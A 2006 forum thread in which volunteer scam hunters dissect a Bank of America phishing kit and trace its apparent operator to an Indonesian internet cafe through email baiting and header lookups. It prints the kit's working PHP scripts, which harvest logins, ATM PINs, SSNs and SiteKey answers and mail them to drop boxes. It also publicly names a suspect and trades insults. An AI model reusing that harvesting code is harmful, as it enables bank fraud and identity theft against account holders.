Re: [Phishing] Bank of America Phish, caught work in Spam, Scam and Phishbusters

Re: [Phishing] Bank of America Phish, caught work

Tue, 07 Feb 2006 14:20:40 EDT

said by Derfel :

Muslims don't like crime.

Which has what to do with anything? Muslim nations suffer crime (as do a lot of nations, not all of them Muslim); some of which crime isn't criminal in the U.S.

Muslims also don't like having RAM shoved up their rectal cavities.

Which has what to do with anything? Buddhists, Christians, Hindus, Jews, and Shintoists don't like it, either; but it happens.

Both of these are happening as I post, if my sources are correct.

I have no way to vet your unnamed sources, so it is your source' words against anybody else' words. If you have something to say, then say it. Just saying, "It ain't so", is not contributing anything useful.
--
Norman
~Oh Lord, why have you come
~To Konnyu, with the Lion and the Drum

Re: [Phishing] Bank of America Phish, caught work

Tue, 07 Feb 2006 04:41:04 EDT

rawwhide :

said by izy :

said by Thaler :

said by purisangeh :

I hope you can remember this pray. I am muslim? I am not sure. American is big politic and economy terorist. We are asian lovin' peace.

Please just get your scrawny ass back to farming WoW gold. I still need my epic mount.

ROFLMAO!!! :D

12 hours later and I still cant stop laughing, thanks for the good laugh.
--
HUH!!! Sekurecom

Re: [Phishing] Bank of America Phish, caught work

Tue, 07 Feb 2006 00:01:59 EDT

pcdebb :

said by tfrionli :

Nice work..

Macs Restub

scaM busteR

:)

hahaha!!! I just caught on to that one, that is absolutely hilarious!!

MGD, you rock ;)
--
babbling | How's the weather?

Re: [Phishing] Bank of America Phish, caught work in progress.

Mon, 06 Feb 2006 20:45:55 EDT

Scott W : ...

Re: [Phishing] Bank of America Phish, caught work in progress.

Mon, 06 Feb 2006 19:59:17 EDT

Derfel : Muslims don't like crime. Muslims also don't like having RAM shoved up their rectal cavities. Both of these are happening as I post, if my sources are correct.

Re: [Phishing] Bank of America Phish, caught work in progress.

Mon, 06 Feb 2006 19:10:44 EDT

inteller : i think this guy doesnt need to quit his day job (working for Dell tech support)
--
"WHEN THE LAUGH TRACK STARTS THEN THE FUN STARTS!"

Re: [Phishing] Bank of America Phish, caught work

Mon, 06 Feb 2006 17:13:50 EDT

removed : I'm pretty sure he's referring to himself as a baby - someone who has no life experience so far.

Re: [Phishing] Bank of America Phish, caught work

Mon, 06 Feb 2006 17:11:06 EDT

La Luna :

said by purisangeh :

....not true I just new baby born in the earth. Please advice me to be nice people.....

I hope you can remember this pray. I am muslim? I am not sure. American is big politic and economy terorist. We are asian lovin' peace.

Love and Peace

Purisangeh (.)(.) -- lick it.

You just graduated from high school and you have a new baby? So this is the kind of person you want to be to your child, a criminal? That's just great.....

We don't care if you're a Muslim, we only care that you are a criminal, hurting other people. If you have the skills you claim you do, do something good with them. I'm sure your child will think much more highly of you.
--
~~Then the rainstorm came over me and I felt my spirit break; I had lost all of my belief you see, and realized my mistake...~~

Re: [Phishing] Bank of America Phish, caught work in progress.

Mon, 06 Feb 2006 17:07:20 EDT

KyeU : What a noob; didn't use a proxy server to send the E-Mail...even I know that and I'm only 17.

But I have not chosen the dark side, as this talented individual has.

quote:
Date of Birth:
October 17, 1982
Age:
23

Re: [Phishing] Bank of America Phish, caught work

Mon, 06 Feb 2006 16:56:59 EDT

tfrionli : Nice work..

Macs Restub

scaM busteR

:)
--
tfrionli

Re: [Phishing] Bank of America Phish, caught work in progress.

Mon, 06 Feb 2006 15:45:48 EDT

ass assassin : just turn him into bank of america.. i mean, a 50 billion dollar a year bank sure would be interested in talking to him, along with the secret service and fbi.. this boy has made a big mistake..

from the bank of america website:

Email and online fraud

To report a suspicious email that uses Bank of America's name, forward it to us immediately at abuse@bankofamerica.com. (If you have general questions about the bank or your accounts, please go to Contact Us.)
Learn more about online fraud and email fraud.
See an example of a fraudulent email

Suspect you are a victim of fraud?
Report fraudulent activity not associated with Online Banking:

In California CA: 800-678-1433
In Idaho and Washington ID, WA: 800.442.6680
All others states: 800-432-1000

Report fraudulent activity within Online Banking:

In California CA: 800-792-0808
In Idaho and Washington ID, WA: 800-442-6680
All other states: 800-933-6262

I am sure they would be interested in getting someone like this.. sure would help their corporate image and fighting phishing scams and such, eh?

Re: [Phishing] Bank of America Phish, caught work

Mon, 06 Feb 2006 15:42:05 EDT

izy :

said by Thaler :

said by purisangeh :

I hope you can remember this pray. I am muslim? I am not sure. American is big politic and economy terorist. We are asian lovin' peace.

Please just get your scrawny ass back to farming WoW gold. I still need my epic mount.

ROFLMAO!!! :D

Re: [Phishing] Bank of America Phish, caught work

Mon, 06 Feb 2006 15:28:39 EDT

Thaler :

said by purisangeh :

I hope you can remember this pray. I am muslim? I am not sure. American is big politic and economy terorist. We are asian lovin' peace.

Please just get your scrawny ass back to farming WoW gold. I still need my epic mount.

Re: [Phishing] Bank of America Phish, caught work

Mon, 06 Feb 2006 15:09:32 EDT

91439306 : It's because these nations have very corrupt governments and the people are profoundly impoverished because of the economic results of corruption.
My stay in the Philippines (Taguig, Pasay, Baguio areas) taught me alot about the nature of people. There are some that will accept their poverty and immerse themselves in religion on the hope of salvation at death, viewing this as a prelude to an eternal life in "heaven", and there are those who are probably, for lack of a better term, not sucked in by that religious BS and do the only easy thing they know how to, with their new found computer skills. So they resort to spamming and scamming.
Having lived in such a country for a while, I can appreciate the utter hopeless situation of economics there. There is NO way to be a success in the Philippines, unless you're Lea Salonga, a popular singer, liked by all Filipinos, or unless you are one of the few lucky ones to get out of the country by marrying a foreigner.
That doesn't change the fact that what the scammers do is totally wrong and subject to severe penalties. It only serves to answer the implicit question: "Why?"
--
Take care,

Mark & Mary Ann Weiss

Hear my Kurzweil Creations at: »www.dv-clips.com/theater.htm
'»www.mwcomms.com/auctions.htm
'»www.mwcomms.com
'»www.adventuresinanimemusic.com
Stereo Feed!

Re: [Phishing] Bank of America Phish, caught work

Mon, 06 Feb 2006 14:32:55 EDT

Jon Geb : Why does it seem that Indonesia, Philippines and all these countries are so full of scammers. Its been this way for years.

I remember about 5 years ago I was looking for a second job and saw an ad in the Detroit News for a "courier" position. I called it and got some American telling me the job was to empty pay phones and deposit the money into a specific account. He told me the job was contracted by the local bell phone companies.

It sounded odd and then he went on to tell me I had to pay a deposit of $400 in order to get started. The alarm started going off right when I heard that. So I humored him and asked him where I was to send the money and info. The address was the Philippines.

Needless to say I knew the scam right then and there.

Re: [Phishing] Bank of America Phish, caught work

Mon, 06 Feb 2006 13:51:27 EDT

ScottK1 : Oh, this is perfect. You have the cajones to committ a felony that could potentially cost innocent people (who work for a living unlike yourself) thousands upon thousands of dollars, and yet you want us to go easy on you because you are a youngster, probably about 17 or thereabouts. People have been going easy on your for your entire life, and it is finally time for you to be a man and face the consequences of your choice. This is, as kids your age like to say, "some serious shit."

If you don't appreciate the seriousness of what you have done, look at it this way: In essence, you have just attempted a bank robbery. Let's add attempted identity theft to the charges as well. Think you better take your shorts off and have your mommy wash them...you just peed your pants, didn't you?

Re: [Phishing] Bank of America Phish, caught work in progress.

Mon, 06 Feb 2006 13:48:46 EDT

RyanG1 : I agree, you have my vote as well as any resources i have that youd need, just drop a line.

Keep up the good work.

Ryan
--
Oh I wish i was an oscar meyer wiener, then everyone would be in love with me....

Re: [Phishing] Bank of America Phish, caught work

Mon, 06 Feb 2006 13:37:57 EDT

Shack : Great Job! Take down this POS. Even though must of the people who this will benefit wil never know to thank you, I will do it in there place. Thanks.

Re: [Phishing] Bank of America Phish, caught work

Mon, 06 Feb 2006 13:30:15 EDT

briartech :

said by catseyenu :

I've got some Indonesian contacts tracking him now.
He'd better not have any "nervous" associates or he's toast.

I know who you are too, so I know that what you said is true. Sooner or later, we'll all be watching one another.

Re: [Phishing] Bank of America Phish, caught work

Sat, 04 Feb 2006 19:19:13 EDT

jig : haven't been back to Indonesia/Jakarta since 9/11, but i still have some friends there... heh, might take some bribes to get the police involved, however.

Re: [Phishing] Bank of America Phish, caught work

Sat, 04 Feb 2006 14:50:31 EDT

MGD :

said by waldoooo :

....I doubt anyone tipped him off, google his name again and guess whats on the top of the list

Yep, finally got his name in lights, hit the big time at last.

Actually, this one is just as interesting: »www.tempointeractive.com/komenta···act=read While he is working on his phishing scams he is also posting locally. Way to go Ariando !! maybe you will get some "police pressure" soon!. On that post you listed Yogyakarta as your home. I thought you were a a jazz musician from New Zealand.? ;) Very confident huh?, you must have thought that no one would ever crack your phishes, and see your email address.

MGD

Re: [Phishing] Bank of America Phish, caught work

Sat, 04 Feb 2006 14:07:57 EDT

waldoooo :

quote:
reply to Anon
Re: [Phishing] Bank of America Phish, caught work

I guess someone must have sent you a "HEADS UP"

I doubt anyone tipped him off, google his name again and guess whats on the top of the list

Re: [Phishing] Bank of America Phish, caught work

Sat, 04 Feb 2006 05:32:37 EDT

catseyenu : I've got some Indonesian contacts tracking him now.
He'd better not have any "nervous" associates or he's toast.

Re: [Phishing] Bank of America Phish, caught work

Sat, 04 Feb 2006 00:03:56 EDT

spanishbob : Enjoying this one, will follow. Would be nice to see this little $hitbag caught. Does FBI coordinate with local police to catch these guys? Even Kiwis have better spelling than that!

Re: [Phishing] Bank of America Phish, caught work

Fri, 03 Feb 2006 23:06:07 EDT

anon : MGD thats hilarious! Good post, most of those phishers are just wanna-be's trying to make a buck the wrong way. Sooner or later is always catches up, whether its police or someone knocking on thier door ..... that post is hilarious!

Re: [Phishing] Bank of America Phish, caught work

Fri, 03 Feb 2006 20:19:00 EDT

MGD : I guess someone must have sent you a "HEADS UP"

said by purisangeh :

Thank you Macs Retsub for your Big mouth ...... You want be a hero here?

Hey that's only a small price that you pay for being a thief and a criminal. Nope, I am not a hero, I just volunteer my time and forensic cyber skills to try and prevent victims from being defrauded.

You are now a member, read my scam hunting posts. I am an "equal opportunity" scam hunter. I follow the trail wherever it leads. Scammers are everywhere, they come in all shapes, sizes, and religions.

....You do not have enough proof to catch me....

Don't bet on it junior!!! Maybe you will read an article about this in your local paper Pikiran Rakyat
. I am sure that the people of Bandung do not like thieves any more than we do.

I hope I can see you as soon as possible, to disccuss our future....

Sure, just so long as your future includes paying a price for your crimes. I have found your fingerprints on many other phishes, so you have been doing this for a while.

I can create all software using Delphi, Php, Asp, Visual Basic, C++. I am not studying in any university yet.....

Great, so why are you using those skills to commit crimes??
instead of doing productive work. Will the universities let you in if they know what you are doing.

Do not be an idiot and bring race and religion into to it. You are a criminal, you got busted !! Face up to it junior..

You spend a lot of time at that Internet Cafe, do you work or live there?? Your emails came from 3 different IP's at the Cafe within a few hours.

MGD

Edit+added link

Re: [Phishing] Bank of America Phish, caught work

Fri, 03 Feb 2006 17:13:52 EDT

removed : You must not be that good if ol' MGD found you. :)

Re: [Phishing] Bank of America Phish, caught work in progress.

Fri, 03 Feb 2006 17:12:33 EDT

purisangeh : Thank you Macs Retsub for your Big mouth to all pigs here. You want be a hero here? I advice you that wash your feet and take a nap your mommy waiting you.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 2 Feb 2006 16:26:47 -0500
From: "Macs Retsub" Add to Address Book Add Mobile Alert
Yahoo! DomainKeys has confirmed that this message was sent by gmail.com. Learn more
To: "ariando huge"
Subject: Re: Kaskus
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

around hundreds peoples around you doing spam. Why you not againts them near you ?? I have been seen your people, on my cyber cafe. You do not have enough proof to catch me. I hope I can see you as soon as possible, to disccuss our future. I can create all software using Delphi, Php, Asp, Visual Basic, C++. I am not studying in any university yet and i just graduated my senior high school. I am hacker? not true I just new baby born in the earth. Please advice me to be nice people.

I hope God Bless you all.

Our Father Who art in Heaven, hallowd be thy name, thy kingdom come .....

I hope you can remember this pray. I am muslim? I am not sure. American is big politic and economy terorist. We are asian lovin' peace.

Love and Peace

Purisangeh (.)(.) -- lick it.

Re: [Phishing] Bank of America Phish, caught work

Fri, 03 Feb 2006 13:45:06 EDT

waldoooo : I like following the threads of MGD & crew as they help "would be" victims and shut down the thiefs. I don't know how Yahoo or the other companies work but it would seem to me that with a few emails to some of the "higher ups" in the companies showing the amount of people helped and scams broken up by MGD and the group here you guys should be able to get either a phone # or at least a direct email address to a support person who could take action and shut down the fradulent accounts.

Re: [Phishing] Bank of America Phish, caught work

Fri, 03 Feb 2006 13:23:45 EDT

daniyel : Good work - that's the way it's done. I had an instance(few of them) where we had AOL employee site posted on our web servers in the middle of the night. By AM, there was already enough hits generated(by emailing internal emp notice/chass pass/update account) to be quite scary, for AOL. I found the creator of the account, ICQ account member the info was being sent after decrypting a cheesy html algorithm. Hosting company didn't want to do anything except turn the accounts off - and refund charges to stolen CC's. After the 6th-7th account, and getting them turned off rapidly, phishers went away and bothered some other host.

Re: [Phishing] Bank of America Phish, caught work

Fri, 03 Feb 2006 11:05:11 EDT

tapeloop : MGD, more power to you my brother. I wish I knew Bahasa so I could help you slam dunk this guy. Keep up the good work and keep us posted.
--
Copyright infringement is illegal. Murder is illegal. Therefore, file sharing is murder.

Re: [Phishing] Bank of America Phish, caught work

Fri, 03 Feb 2006 10:27:31 EDT

pleekmo :

said by Ummmyea :

How is your email not traceable?

Anonymous re-mailer, perhaps.
--
HCN: Because you deserve a rest!

I wonder what Spock would have to say (or do) about Omelas?

Re: [Phishing] Bank of America Phish, caught work

Fri, 03 Feb 2006 10:17:46 EDT

anon : How is your email not traceable?

Re: [Phishing] Bank of America Phish, caught work

Fri, 03 Feb 2006 04:21:47 EDT

MGD : Interesting follow up:

Though the digging through phishes looking for and extracting the email drop boxes is both tedious and time consuming, what irks me the most is the failure of the majors to yank the accounts despite frequent larts. If these drop box accounts were pulled promptly, it would prevent the phised data from being recovered. Now that most of the email providers have forsaken the abuse@ and gone to online forms for complaints (Gmail,Yahoo etc.), they have no easy method for reporting them. Getting clueless replies requesting the email headers from the "offending account", despite including snippets from the code clearly indentifying the email address as part of a scam, is frustrating. By the time the issue is escalated to a clued rep, the data is long gone.

With that in mind, I sometimes go back a few weeks afterwards, and recheck the dpop accounts to see if they were cancelled. In addition to using the Rcp to @ the mx server, I also send an email to the address to see if it bounces. I usually include some benign reference to the Phish to see if I can elicit a response, and every now and then I get one.

Two days ago I tested the purisangeh_team@yahoo.com drop box on this BOA phish, now over a month old. I always want to include some trigger in the subject line to try and get attention. In this case I listed the subject as "KASKUS" which is a Indonesian chat forum that was one of the few places where the name Purisangeh had turned up as a poster: »www.kaskus.com/member.php?u=69571 Indonesia became a focus since a previous identical BOA phish which was reported in NANAS on 12/05, was also emailed via the exact same open proxy as this one: »groups.google.com/group/news.adm···e0261745 Coincidentally that phish site was hosted on a hijacked box in Indonesia.

So I sent off the following email to the phish drop box:

From: Macs Retsub
To: purisangeh_team@yahoo.com
Date: Feb 1, 2006 5:53 PM
Subject: Kaskus

Hey, I still have the files from the Bank of America phish.
The address rdcpt0809@airpost.com is dead.
Which other one can I use??

I have the logs too.

I try to make them fuzzy, but throw in a few clues, and hope they respond with their guard down. Well about 24 hours later in pops this:

From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 4:06 AM
Subject: Re: Kaskus

What are you talking about???

Ahh, got a hit !! so I responded with some more info, and included a snippet of the BOA phish processing script showing the data collection address.

From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 12:16 PM
Subject: Re: Kaskus

The data from the credit card and BOA scam:
Some of the logs were sent to me by mistake??

if(isset($atm_number) || isset($pin)) 
{ if(!ereg("^[0-9]+$",$atm_number) || !ereg("^[0-9]+$",$pin))
    { header("Location: GotoErrorVerifyPage.htm"); return FALSE;}  }  
 
session_start();
 
//USER ACCOUNT
 
$D1 = $_POST['D1'];
$online_id = $_POST['online_id'];
$passcode = $_POST['passcode'];
$repasscode = $_POST['repasscode'];
$email = $_POST['email'];
$atm_number = $_POST['atm_number'];
$pin = $_POST['pin']; 
 
//SECURITY QUESTION
 
$ssn1 = $_POST['ssn1'];$ssn2 = $_POST['ssn2'];$ssn3 = $_POST['ssn3'];
$ip = $_SERVER["REMOTE_ADDR"];
 
$subj = "Full Info  BoA ip :$ip";
$msg = "Full Info From ip :$ip 
      \nUSER ACCOUNT
      \n-------------------
    \n\nAccount open in : $D1\nOnline ID : $online_id\nPasscode : $passcode\nLast 8 Digit ATM : $atm_number\nATM PIN : $pin\nEmail : $email
    \n\nSECURITY QUESTION 
      \n---------------------
    \n\nS S N : $ssn1-$ssn2-$ssn3";
 
$from = "From: BoA";
$to = " purisangeh_team@yahoo.com";

I thought that it may break the ice!! or loose him. However, he responded:

From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 1:28 PM
Subject: Re: Kaskus

By the way who are you and what is your business. I just signed up this email for 2 weeks ago. Maybe you made a mistake of contact to person that you mentioned. Please let me know what can I do for you??

Regard,

Huge

Well! that's a big lie, as I posted above I checked the address at the time of posting the dig and it was valid and I also checked it several times afterwards. Yahoo could not have recylcled it in a 48 hour period. Besides, is there a waiting list for Purasengh_Team at Yahoo. In addition the script files that contained the addy were dated ~12/25. So I responded:

From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 2:05 PM
Subject: Re: Kaskus

You need to check again, this account was active on or before January 1, 2006, who is in the "Team" ??

Within twenty minutes I get this back:

From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 2:24 PM
Subject: Re: Kaskus

How you can chek it? and who are you? why you investigate me like police? i am musician in New Zealand. Purisangeh is my Group Band Name. What you want ask from me again??

Now I am thinking, is this guy an intern for the Purisangeh Team or what?, I had my red push pin stuck in Jakarta on my world map. Now he says that he is in New Zealand. Well he lied about the two week old email address, so I checked on his honesty by having a look at the mail headers.

X-Gmail-Received: b633b5e5f8108d9d26a619a897e71f68e0d6477a
Delivered-To: *******@gmail.com
Received: by 10.48.248.4 with SMTP id v4cs6897nfh;
Thu, 2 Feb 2006 01:06:55 -0800 (PST)
Received: by 10.54.128.14 with SMTP id a14mr2115170wrd;
Thu, 02 Feb 2006 01:06:55 -0800 (PST)
Return-Path:
Received: from web32002.mail.mud.yahoo.com (web32002.mail.mud.yahoo.com [68.142.207.99])
by mx.gmail.com with SMTP id 11si5302468wrl.2006.02.02.01.06.54;
Thu, 02 Feb 2006 01:06:55 -0800 (PST)
Received-SPF: pass (gmail.com: domain of purisangeh_team@yahoo.com designates 68.142.207.99 as permitted sender)
DomainKey-Status: good (test mode)
Received: (qmail 29227 invoked by uid 60001); 2 Feb 2006 09:06:47 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
s=s1024; d=yahoo.com;
h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
Message-ID:
Received: from [222.124.19.29] by web32002.mail.mud.yahoo.com via HTTP; Thu, 02 Feb 2006 01:06:46 PST
Date: Thu, 2 Feb 2006 01:06:46 -0800 (PST)
From: ariando huge
Subject: Re: Kaskus
To: Macs Retsub

I then did a lookup of IP 222.124.19.29

Location: Indonesia (high) [City: Jakarta, Jakarta Raya (Djakarta Raya)]
inetnum: 222.124.19.16 - 222.124.19.31
netname: TLKM_D3_AST_DUYA_MEDIA
country: ID
descr: PT. DUYA MEDIA
descr: Public Internet Cafe
descr: Jl. Buah Batu No. 165D
descr: Bandung
admin-c: KI32-AP
tech-c: KI32-AP
remarks: ------------------------------------------------------------------
remarks: Send ABUSE and SPAM reports with plain ASCII text only to
remarks: **********@yahoo.com cc to *****@telkom.net.id
remarks: The netname enclosed in square bracket is included in the subject.
remarks: ------------------------------------------------------------------
status: ASSIGNED NON-PORTABLE
changed: ****@telkom.co.id 20050725
mnt-by: MAINT-TELKOMNET
source: APNIC

person: KHAIRIL IMAMI
nic-hdl: KI32-AP
e-mail: **********@yahoo.com
address: Jl. Buah Batu No. 165D
address: BANDUNG
phone: +62227319398
country: ID
changed: ****@telkom.co.id 20050718
mnt-by: MAINT-TELKOMNET
source: APNIC

Ha ha, "huge ariando" you are right where I thought you were, and in an internet cafe no less in downtown Bandung, which is the capital city of West Java Province, about 100 miles southeast of Jakarta. Not exactly New Zealand, so I wrote:

From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 2:53 PM
Subject: Re: Kaskus

Then why are you now at an Internet Cafe in Bandung?? are you on holidays?
What kind of music do you play? what does Purisangeh mean?

I didn't want to blow him away, I wanted to keep him going, so I included an out!
Then I got this:

From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 3:39 PM
Subject: Re: Kaskus

I still do not understand with you. I am Jazz Musician. We are in concernt here since 28 january. Listen to me, now i really feel annoyed because of you. I dont know you and you not tell me who you are? So stop email me anonymous person.

BYE.

Ouch!!, yes I am sort of anonymous, my email is not traceable. I don't want to loose him just yet, so I take a five minute refresher course in geography. There are several universities in Bandung, I suspect he may be a student. I try to get him back by alluding to be right there, amd throw some local names in.

From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 4:26 PM
Subject: Re: Kaskus

Please, do not be annoyed, I like Jazz music too, more progressive though, I am a big fan of DISCUS. Where are you playing at ? the Savoy? maybe I can attend a concert, I checked the papers and I don't see any adverts. Maybe you can come back from New Zealand and play at one of the festivals at Bale Ayer in Taman Ria Senayan in Jakarta, have you ever been there? Try and visit Saung Mang Udjo while you are here. How many are in your band? What instrument do you play?

Wow!! it took all of 4 minutes to get a reply. Boy he sure spends a lot of time on the web in a internet cafe for a on tour "in concert jazz musician"

From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 4:30 PM
Subject: Re: Kaskus

are you indonesian?? " Apa Kabar? " Why you know all about indonesian place? can you chate with me on yahoo messager? My ID is homebeautypink. I am online now.

Regard,

Huge

Well that sure brought him right back, and he is a homeboy, look at that, form a New Zealander to " Apa kabar" all in a few messages. Well I looked it up:
The phrase "apa kabar" literally means "what (your) news". ... To answer "apa kabar", we usually use "baik" or "baik-baik" to indicate that it's good

I never replied to the "invitation" as I would have to use a nearby proxy, plus I am now stuck language wise. I decided to preserve my options, and sleep on it.
I really just want to get an answer to " What the F**k did you do with all the credit card data that came streaming into that account, and what other scams are now ongoing.

MGD

Edit=typo+formatting

Re: [Phishing] Bank of America Phish, caught work

Fri, 06 Jan 2006 17:54:35 EDT

MGD :

said by removed :

To elaborate on the "suspended.page" directory: it's a standard cPanel (web hosting control panel) thing,.....

Ahh, that explains why I have ran across it multiple times. Can we then assume it a total hack job because the file is dated the same as the phish folders?. He must also have control over the domain dns, in order to have created the sub domain prefix.

MGD

Re: [Phishing] Bank of America Phish, caught work

Fri, 06 Jan 2006 16:55:17 EDT

huntermcdole : Good to know that they are going down. I have a catch all account at my domain so I get a lot of spam and some of them are phishing attemps. That was the first one I have seen where the link almost lookd like the real site, most I see are 124.15.154.21 type

Re: [Phishing] Bank of America Phish, caught work

Fri, 06 Jan 2006 16:46:12 EDT

removed : To elaborate on the "suspended.page" directory: it's a standard cPanel (web hosting control panel) thing, and probably not something that the scammer set up to fool authorities.

[Phishing] Bank of America Phish, caught work in progress.

Fri, 06 Jan 2006 16:31:21 EDT

MGD : I was checking out a BOA phish posted by huntermcdole on phishtrack: »/phishtrack?pi···&parts=1 I am looking to see if any wizards out there can review that following data, and dig up any additional info or fingerprints on these criminals.

This is a very professional and slick phish »www.bankofamerica.com.cgi-bin.bo···ller.htm because in addition to the victims account data, it also seems to create or obtain your sitekey data. You can enter bogus info on the first page and then see what the sitekey page is trying to do.

Fortunately while monitoring the phish site I came across the entire upload package from the phisher. They went back and removed the zipped payload within a few hours [Exhibit 1 & 2]. There may be additional unique data that can be found, see attached presentation.zip. Though you obviously cannot see the php scripts on other BOA phishes, I wonder if there are other unique items that could be used to link them to the same author.

Someone more familiar with php scripts can confirm if there are two separate emails going to the phisher. One from "securekey.php" with sitekey/securekey info going to: purisangeh_team@yahoo.com and a back up to rdcpt0809@airpost.com with a from of BoA(support[AT]PlatinumBank.com)

 
//if($securityKey3Ansr==""||$securityKey2Ans==""||$securityKey1Ans=="")
  //  {header("Location: GotoErrorsecurityKeyPage.htm");return FALSE; }
 
session_start();
 
//USER ACCOUNT
 
$securityKey1 = $_POST['securityKey1'];
$securityKey1Ans = $_POST['securityKey1Ans'];
$securityKey2 = $_POST['securityKey2'];
$securityKey2Ans = $_POST['securityKey2Ans'];
$securityKey3 = $_POST['securityKey3'];
$securityKey3Ansr = $_POST['securityKey3Ans'];
$ip = $_SERVER["REMOTE_ADDR"];
 
$subj = "Site Key BoA ip :$ip";
$msg = "Site key From ip :$ip
      \n-------------------
    \n\nSiteKey Challenge Question1: $securityKey1\nAnswer1: $securityKey1Ans\nSiteKey Challenge Question2: $securityKey2\nAnswer2: $securityKey2Ans\nSiteKey Challenge Question3: $securityKey3\nAnswer3: $securityKey3Ans
    ";
 
$from = "From: BoA";
$to = "purisangeh_team@yahoo.com";
$backup = "rdcpt0809@airpost.com";
 
mail($to, $subj, $msg, $from, $chk);
mail($backup, $subj, $msg, $from, $chk);
header("Location: GotoCompletePage.htm");
 
?>

Another file "update.php" appears to be mailing the online id passcode and atm info to the same addresses:

 
if($D1==""||$online_id==""||$passcode==""||$email=="")
 { if(! ereg ("^.+@.+\\..+$", $email))
    {header("Location: GotoErrorAccountPage.htm");return FALSE; }}
 
if($ssn3=="")
 { header("Location: GotoErrorSecurityPage.htm");return FALSE; }
 
if(isset($atm_number) || isset($pin))
{ if(!ereg("^[0-9]+$",$atm_number) || !ereg("^[0-9]+$",$pin))
    { header("Location: GotoErrorVerifyPage.htm"); return FALSE;}  }  
 
session_start();
 
//USER ACCOUNT
 
$D1 = $_POST['D1'];
$online_id = $_POST['online_id'];
$passcode = $_POST['passcode'];
$repasscode = $_POST['repasscode'];
$email = $_POST['email'];
$atm_number = $_POST['atm_number'];
$pin = $_POST['pin'];
 
//SECURITY QUESTION
 
$ssn1 = $_POST['ssn1'];$ssn2 = $_POST['ssn2'];$ssn3 = $_POST['ssn3'];
$ip = $_SERVER["REMOTE_ADDR"];
 
$subj = "Full Info  BoA ip :$ip";
$msg = "Full Info From ip :$ip
      \nUSER ACCOUNT
      \n-------------------
    \n\nAccount open in : $D1\nOnline ID : $online_id\nPasscode : $passcode\nLast 8 Digit ATM : $atm_number\nATM PIN : $pin\nEmail : $email
    \n\nSECURITY QUESTION
      \n---------------------
    \n\nS S N : $ssn1-$ssn2-$ssn3";
 
$from = "From: BoA";
$to = "purisangeh_team@yahoo.com";
                                                                                                                                                                                                                                              $backup = "rdcpt0809@airpost.net";
 
mail($to, $subj, $msg, $from, $chk);
                                                                                                                                                                                                                                              mail($backup, $subj, $msg, $from, $chk);
header("Location: GotoCompletePage.htm");
 
?>

Unfortunately without figuring out the password to the Yahoo email account there is no way to locate victims. I have never been able to have Yahoo pull an account based on submitting a script snippet showing that it is being used as a data collection tool. I guess it is possible to interfere and load them with bogus data by looking at the way the script formats the mail.

While the yahoo address is currently valid, it is difficult to check the backup one. Airpost.net appears to be a Canadian company that maybe forwards email, though it appears that there is no current DNS records so I am not sure if it is active.

The use of purisangeh_team indicates a group operation. Purisangeh may be Indonesian as indicated by a google search: »www.google.com/search?hl=en&q=Pu···e+Search I went to the Kaskus site listed at the top of the search looking for posts by the user Purisangeh, however the forum search function is disabled. It was worth checking because the search shows that it is not a common word. (WARNING: while looking at the google cache of KASKUS yesterday I got a popup with an attempt to install the wmf exploit, it only happened once, I have been back several times without incident, but be careful if you go there.)

Due to Google showing that "purisangeh" was rather unique, I decided to check out the purisangeh.org that was included in the search return. It is not an active domain, the A record points to Yahoo but looks like it may be pulled. Checking on the registration shows that it was registered in October of 2004 for 5 years to an individual in Cummings, GA. using an email address of purisangeh8181@yahoo.com. Someone in Georgia registering a name like that for 5 years did not seem cool, so I called the registered telephone number which turned out to be not them. I located a correct number for that name and spoke to the individual. As suspected they did not register the Purisangeh.org domain. However in October of 04 at the same time as the registration their credit card had been hit for hundreds of dollars in fraudulent charges. Their Bank notified them that the multiple charges were for all kinds of "Internet services". I am convinced that these are the same criminals.

I am not sure what is going on where the phish is hosted at cfusa.net. Doesn't the phisher need control of the domain in order to do this?: »www.bankofamerica.com.cgi-bin.bo···fusa.net which resolves the same as »www.cfusa.net. Notice how the phisher has his own "suspended page" available at »www.bankofamerica.com.cgi-bin.bo···ed.page/ I have seen that exact page format on other phishes. I guess you can fake the account as being closed when the heat is on, slick!!.

As recent as December 21st the google cache of the site showed this:»64.233.187.104/search?q=cache:vI···/+&hl=en Seems a little strange !!. The domain has been around for a few years see archive: »web.archive.org/web/*/http://www.cfusa.net

MGD

P.S. Since preparing this post the phish page now appears to be down, it was down and modified a few times during the research but came back. The directories are all still there.

Before
After
Cfusa Dir